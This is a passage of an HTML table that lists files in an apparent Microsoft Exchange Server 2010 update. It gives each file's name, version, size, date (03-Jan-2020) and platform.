td>Im.js</td><td>Not applicable</td><td>54,992</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Imcd32.dll</td><td>8.5.3.76</td><td>123,744</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imcd42.dll</td><td>8.5.3.76</td><td>142,688</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imcd52.dll</td><td>8.5.3.76</td><td>144,736</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imcd62.dll</td><td>8.5.3.76</td><td>159,072</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imcd72.dll</td><td>8.5.3.76</td><td>279,392</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imcd82.dll</td><td>8.5.3.76</td><td>279,392</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imcdr2.dll</td><td>8.5.3.76</td><td>73,056</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imcm52.dll</td><td>8.5.3.76</td><td>63,840</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imcm72.dll</td><td>8.5.3.76</td><td>117,088</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imcmx2.dll</td><td>8.5.3.76</td><td>32,096</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imdsf2.dll</td><td>8.5.3.76</td><td>168,288</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imfmv2.dll</td><td>8.5.3.76</td><td>67,424</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imgdf2.dll</td><td>8.5.3.76</td><td>77,664</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imgem2.dll</td><td>8.5.3.76</td><td>56,672</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imigs2.dll</td><td>8.5.3.76</td><td>117,088</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Immet2.dll</td><td>8.5.3.76</td><td>167,264</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Impif2.dll</td><td>8.5.3.76</td><td>71,008</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Importedgeconfig.ps1</td><td>Not applicable</td><td>77,620</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Import_retentiontags.ps1</td><td>Not applicable</td><td>26,811</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Impsi2.dll</td><td>8.5.3.76</td><td>2,031,968</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Impsz2.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imps_2.dll</td><td>8.5.3.76</td><td>124,256</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Imrnd2.dll</td><td>8.5.3.76</td><td>38,752</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Info.aspx</td><td>Not applicable</td><td>3,447</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Inproxy.dll</td><td>14.3.470.0</td><td>95,664</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Installwindowscomponent.ps1</td><td>Not applicable</td><td>25,053</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Install_antispamagents.ps1</td><td>Not applicable</td><td>14,528</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Interop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>14.3.470.0</td><td>126,600</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Interop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>14.3.470.0</td><td>27,272</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Interop.certenroll.dll</td><td>14.3.470.0</td><td>155,272</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Interop.migbase.dll</td><td>14.3.470.0</td><td>57,184</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Interop.netfw.dll</td><td>14.3.470.0</td><td>48,776</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Interop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>14.3.470.0</td><td>32,904</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Interop.wuapilib.dll</td><td>14.3.470.0</td><td>77,656</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Interop.xenroll.dll</td><td>14.3.470.0</td><td>56,968</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Iphgw2.dll</td><td>8.5.3.76</td><td>222,048</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Isgdi32.dll</td><td>8.5.3.76</td><td>1,406,312</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Isinteg.exe</td><td>14.3.470.0</td><td>456,648</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Kerbauth.dll</td><td>14.3.470.0</td><td>69,552</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Languageselection.aspx</td><td>Not applicable</td><td>5,421</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Largetoken_iis_ews.ps1</td><td>Not applicable</td><td>19,631</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Largetoken_kerberos.ps1</td><td>Not applicable</td><td>13,874</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Logoff.aspx</td><td>Not applicable</td><td>6,067</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Logon.aspx</td><td>Not applicable</td><td>13,479</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Lpsetupui.exe</td><td>14.3.470.0</td><td>241,288</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Lpversioning.xml</td><td>Not applicable</td><td>17,581</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Mad.exe</td><td>14.3.470.0</td><td>1,371,592</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Madmsg.dll</td><td>14.3.470.0</td><td>108,456</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Mailboxdatabasereseedusingspares.ps1</td><td>Not applicable</td><td>38,829</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Managescheduledtask.ps1</td><td>Not applicable</td><td>34,405</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Mapiprotocolhandlerstub.dll</td><td>14.3.470.0</td><td>81,840</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Mdbevent.dll</td><td>14.3.470.0</td><td>500,136</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Mdbmsg.dll</td><td>14.3.470.0</td><td>231,856</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Mdbperf.dll</td><td>14.3.470.0</td><td>475,568</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Mdbperf.ini</td><td>Not applicable</td><td>724,818</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Mdbperfx.dll</td><td>14.3.470.0</td><td>476,080</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Mdbrest.dll</td><td>14.3.470.0</td><td>704,944</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Mdbsz.dll</td><td>14.3.470.0</td><td>56,752</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Mdbtask.dll</td><td>14.3.470.0</td><td>455,624</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Meetingpage.aspx</td><td>Not applicable</td><td>12,927</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Messages.xsd</td><td>Not applicable</td><td>21,147</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Microsoft.dkm.proxy.dll</td><td>14.3.470.0</td><td>44,744</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.abproviders.ad.dll</td><td>14.3.470.0</td><td>48,840</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.addressbook.service.eventlog.dll</td><td>14.3.470.0</td><td>20,912</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.addressbook.service.exe</td><td>14.3.487.0</td><td>155,344</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.airsync.airsyncmsg.dll</td><td>14.3.470.0</td><td>49,584</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.airsync.dll1</td><td>14.3.487.0</td><td>1,183,440</td><td>03-Jan-2020</td><td>05:45</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.airsynchandler.dll</td><td>14.3.487.0</td><td>69,328</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.antispam.eventlog.dll</td><td>14.3.470.0</td><td>27,048</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdate.eventlog.dll</td><td>14.3.470.0</td><td>21,936</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdatesvc.exe</td><td>14.3.470.0</td><td>44,896</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.approval.applications.dll</td><td>14.3.487.0</td><td>69,328</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.dll</td><td>14.3.487.0</td><td>233,168</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.eventlog.dll</td><td>14.3.470.0</td><td>29,608</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.auditlogsearch.eventlog.dll</td><td>14.3.470.0</td><td>19,888</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.auditlogsearchservicelet.dll</td><td>14.3.487.0</td><td>65,232</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.authorizationplugin.dll</td><td>14.3.487.0</td><td>78,544</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.authservicehostservicelet.dll</td><td>14.3.470.0</td><td>22,656</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.dll</td><td>14.3.487.0</td><td>282,320</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.eventlogs.dll</td><td>14.3.470.0</td><td>27,568</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.cabutility.dll</td><td>14.3.470.0</td><td>264,328</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatedeployment.eventlog.dll</td><td>14.3.470.0</td><td>22,448</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatedeploymentservicelet.dll</td><td>14.3.470.0</td><td>40,584</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.common.dll</td><td>14.3.470.0</td><td>61,128</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.eventlogs.dll</td><td>14.3.470.0</td><td>82,864</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.clients.owa.dll</td><td>14.3.487.0</td><td>3,321,560</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.security.dll</td><td>14.3.487.0</td><td>89,808</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.strings.dll</td><td>14.3.470.0</td><td>966,344</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.replay.dll</td><td>14.3.487.0</td><td>1,969,880</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.replicaseeder.dll</td><td>14.3.470.0</td><td>101,064</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.cluster.replicavsswriter.dll</td><td>14.3.487.0</td><td>184,528</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.dll</td><td>14.3.470.0</td><td>110,280</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.il.dll</td><td>14.3.470.0</td><td>20,168</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.processmanagermsg.dll</td><td>14.3.470.0</td><td>24,488</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.commonmsg.dll</td><td>14.3.470.0</td><td>29,104</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.dll</td><td>14.3.470.0</td><td>57,032</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.certificateauth.dll</td><td>14.3.487.0</td><td>57,040</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.delegatedauth.dll</td><td>14.3.470.0</td><td>61,128</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.dll</td><td>14.3.487.0</td><td>1,052,368</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.eventlog.dll</td><td>14.3.470.0</td><td>36,272</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.redirectionmodule.dll</td><td>14.3.487.0</td><td>89,808</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.contentfilter.wrapper.exe</td><td>14.3.470.0</td><td>182,184</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.core.strings.dll</td><td>14.3.470.0</td><td>163,528</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.dll</td><td>14.3.487.0</td><td>429,776</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.eventlog.dll</td><td>14.3.470.0</td><td>21,424</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.directory.dll</td><td>14.3.470.0</td><td>3,469,144</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.eventlog.dll</td><td>14.3.470.0</td><td>83,888</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.dll</td><td>14.3.470.0</td><td>921,432</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.filedistributionservice.eventlog.dll</td><td>14.3.470.0</td><td>28,592</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.mapi.dll</td><td>14.3.487.0</td><td>220,880</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.providers.dll</td><td>14.3.487.0</td><td>184,016</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.clientstrings.dll</td><td>14.3.470.0</td><td>98,136</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.dll</td><td>14.3.487.0</td><td>5,287,632</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.eventlog.dll</td><td>14.3.470.0</td><td>28,592</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.dll</td><td>14.3.470.0</td><td>52,936</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.eventlog.dll</td><td>14.3.470.0</td><td>19,888</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.eventlog.dll</td><td>14.3.470.0</td><td>19,888</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenterstrings.dll</td><td>14.3.470.0</td><td>81,544</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.dll</td><td>14.3.470.0</td><td>827,080</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgecredentialsvc.exe</td><td>14.3.470.0</td><td>28,288</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.common.dll</td><td>14.3.470.0</td><td>167,768</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.datacenterproviders.dll</td><td>14.3.470.0</td><td>233,312</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.eventlog.dll</td><td>14.3.470.0</td><td>29,616</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.edgesyncsvc.exe</td><td>14.3.470.0</td><td>114,528</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.exchangecertificate.eventlog.dll</td><td>14.3.470.0</td><td>18,864</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.exchangecertificateservicelet.dll</td><td>14.3.470.0</td><td>52,872</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.eventlog.dll</td><td>14.3.470.0</td><td>20,400</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.extensibility.internal.dll</td><td>14.3.470.0</td><td>446,304</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.groupmetrics.eventlog.dll</td><td>14.3.470.0</td><td>18,864</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.groupmetricsservicelet.dll</td><td>14.3.470.0</td><td>28,296</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.hathirdpartyreplication.dll</td><td>14.3.470.0</td><td>61,128</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.helpprovider.dll</td><td>14.3.470.0</td><td>52,872</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll</td><td>14.3.470.0</td><td>23,984</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.imap4.exe</td><td>14.3.487.0</td><td>225,192</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4service.exe</td><td>14.3.487.0</td><td>28,880</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.assistantsclientresources.dll</td><td>14.3.470.0</td><td>53,088</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.common.dll</td><td>14.3.487.0</td><td>1,470,160</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.common.mailtips.groupmetricsreaderinterop.dll</td><td>14.3.470.0</td><td>23,904</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.eventlog.dll</td><td>14.3.470.0</td><td>58,800</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.meetingvalidator.dll</td><td>14.3.487.0</td><td>131,008</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.instantmessaging.dll</td><td>14.3.470.0</td><td>69,320</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.irm.formprotector.dll</td><td>14.3.470.0</td><td>159,144</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.msoprotector.dll</td><td>14.3.470.0</td><td>59,312</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.ofcprotector.dll</td><td>14.3.470.0</td><td>53,680</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.isam.esebcli.dll</td><td>14.3.470.0</td><td>95,576</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.isam.interop.dll</td><td>14.3.470.0</td><td>363,352</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.live.domainservices.dll</td><td>14.3.470.0</td><td>135,000</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.common.dll</td><td>14.3.487.0</td><td>577,232</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.dll</td><td>14.3.487.0</td><td>364,240</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.eventlog.dll</td><td>14.3.470.0</td><td>30,640</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.provider.dll</td><td>14.3.487.0</td><td>179,920</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyclient.dll</td><td>14.3.487.0</td><td>126,672</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyservice.dll</td><td>14.3.487.0</td><td>122,576</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailsubmission.eventlog.dll</td><td>14.3.470.0</td><td>22,448</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.controlpanel.dll</td><td>14.3.496.0</td><td>3,650,440</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanelmsg.dll</td><td>14.3.470.0</td><td>34,736</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.detailstemplates.dll</td><td>14.3.470.0</td><td>89,800</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.dll</td><td>14.3.487.0</td><td>12,291,792</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.edge.systemmanager.dll</td><td>14.3.470.0</td><td>77,512</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.nativeresources.dll</td><td>14.3.470.0</td><td>208,328</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.powershell.support.dll</td><td>14.3.487.0</td><td>110,288</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.publicfolders.dll</td><td>14.3.470.0</td><td>151,240</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.snapin.esm.dll</td><td>14.3.487.0</td><td>2,563,792</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.systemmanager.dll</td><td>14.3.470.0</td><td>1,281,736</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementgui.dll</td><td>14.3.470.0</td><td>5,418,696</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementmsg.dll</td><td>14.3.470.0</td><td>33,712</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagesecurity.dll</td><td>14.3.470.0</td><td>93,832</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.messagesecuritymsg.dll</td><td>14.3.470.0</td><td>23,472</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.edgeagents.dll</td><td>14.3.470.0</td><td>81,544</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.eventlog.dll</td><td>14.3.470.0</td><td>27,568</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.journalagent.dll</td><td>14.3.487.0</td><td>114,600</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.redirectionagent.dll</td><td>14.3.487.0</td><td>31,960</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rmsvcagent.dll</td><td>14.3.487.0</td><td>138,960</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rules.dll</td><td>14.3.487.0</td><td>179,920</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.transportruleagent.dll</td><td>14.3.487.0</td><td>32,976</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.mobiledriver.dll</td><td>14.3.487.0</td><td>155,344</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.eventlog.dll</td><td>14.3.470.0</td><td>18,864</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.monitoring.exe</td><td>14.3.487.0</td><td>73,424</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.dll</td><td>14.3.470.0</td><td>2,186,952</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabauthmodule.dll</td><td>14.3.470.0</td><td>25,736</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabmaintenance.eventlog.dll</td><td>14.3.470.0</td><td>20,912</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.oabmaintenanceservicelet.dll</td><td>14.3.470.0</td><td>56,968</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll</td><td>14.3.470.0</td><td>22,984</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.pop3.exe</td><td>14.3.487.0</td><td>98,000</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3service.exe</td><td>14.3.487.0</td><td>28,880</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.popimap.core.dll</td><td>14.3.487.0</td><td>159,440</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.powershell.configuration.dll</td><td>14.3.487.0</td><td>200,400</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.powershell.rbachostingtools.dll</td><td>14.3.487.0</td><td>81,616</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.protectedservicehost.exe</td><td>14.3.487.0</td><td>32,464</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioningagent.dll</td><td>14.3.487.0</td><td>192,208</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.pst.dll</td><td>14.3.470.0</td><td>179,848</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.routingtablelogparser.dll</td><td>14.3.470.0</td><td>110,216</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpc.dll</td><td>14.3.470.0</td><td>873,672</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.r